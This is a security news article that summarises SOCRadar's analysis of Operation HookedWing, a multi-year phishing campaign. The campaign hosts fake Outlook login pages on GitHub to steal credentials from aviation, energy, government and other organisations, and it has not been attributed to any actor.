SOCRadar researchers published analysis of Operation HookedWing, a sustained credential-harvesting phishing campaign running since at least 2022 that has compromised more than 2,000 user credentials across over 500 organizations in aviation, energy, government, critical infrastructure, logistics, and financial services — with attribution unresolved despite four years of continuous operation.
Operation HookedWing’s GitHub-Hosted Phishing Infrastructure Defeats URL Blocking
SOCRadar’s investigation identified the campaign’s defining operational characteristic: phishing landing pages hosted on GitHub repositories rather than attacker-controlled domains. GitHub is classified as a trusted platform by virtually every corporate network security product, meaning URL and domain-reputation blocking — the most commonly deployed phishing defense — cannot intercept links pointing to GitHub-hosted content without also blocking GitHub entirely.
The phishing emails impersonate HR personnel, colleagues, or system notification services, directing recipients to landing pages that simulate Microsoft Outlook’s login interface. The fake Outlook page employs a full-screen pre-loader and dynamically personalizes the displayed organization name based on the victim’s email domain — presenting, for example, a page that appears to be the victim’s specific organization’s Outlook login rather than a generic Microsoft page. This domain-aware personalization increases the cognitive plausibility of the credential prompt for victims who would otherwise notice a discrepancy between the displayed organization and their own.
SOCRadar identified more than two dozen command-and-control servers and over 100 GitHub domains used as phishing infrastructure across the campaign’s four-year run — an infrastructure scale that indicates a well-resourced operation capable of rotating assets faster than blocklist updates can track.
Operation HookedWing Harvests Credentials, Geolocation, and Org Domain per Victim
Each successful credential submission delivers a comprehensive data set to the campaign’s operators. Beyond the email address and password, the operation captures the victim’s IP address, full geolocation, the source URL that delivered the phishing link, and the victim’s organization domain. This combination provides the attacker with everything needed for organization-specific follow-on targeting: confirmed valid credentials, the network location of the victim, and the organizational context for scoping subsequent intrusion activity.
SOCRadar noted that the targeting across the campaign’s four years is “not random” but concentrated on organizations of “high geopolitical relevance” — the aviation and travel sector, critical infrastructure operators, energy companies, government agencies, financial services firms, and public administration bodies across multiple continents. The sustained, multi-year targeting of these specific sectors is consistent with intelligence collection priorities rather than financially motivated credential resale.
Operation HookedWing: Four Years of Aviation and Critical Infrastructure Targeting With No Actor Identified
Despite documenting Operation HookedWing’s infrastructure, attack chain, and target sectors over a four-year period, SOCRadar’s analysis did not attribute the campaign to a specific known threat actor. The campaign has maintained operational consistency — the same core phishing infrastructure and Outlook simulation technique — while updating C2 servers and GitHub-hosted assets to stay ahead of detection. This combination of operational discipline and long-term persistence is characteristic of well-resourced threat actors operating under sustained intelligence collection mandates.
Aviation and Energy Targeting Signals Geopolitical Intelligence Collection
The campaign’s sector focus maps closely to categories of infrastructure that hold operational intelligence value beyond commercial competitive advantage. Aviation organizations hold flight schedules, air traffic management data, and cargo routing information. Energy sector organizations manage grid operations, fuel supply chains, and production data. Government and public administration targets hold policy, personnel, and inter-agency communications.
The sustained, four-year investment in maintaining a phishing operation of this scale — across 500+ target organizations and 24+ C2 servers — without pivoting to ransomware or publicly visible financial crimes suggests the operation’s value lies in the intelligence collected rather than in monetization of compromised accounts. The absence of attribution leaves open which state or non-state actor has been accumulating credentials across Western and international critical infrastructure since 2022. SOCRadar reported their findings to relevant law enforcement and industry partners as part of their disclosure process.
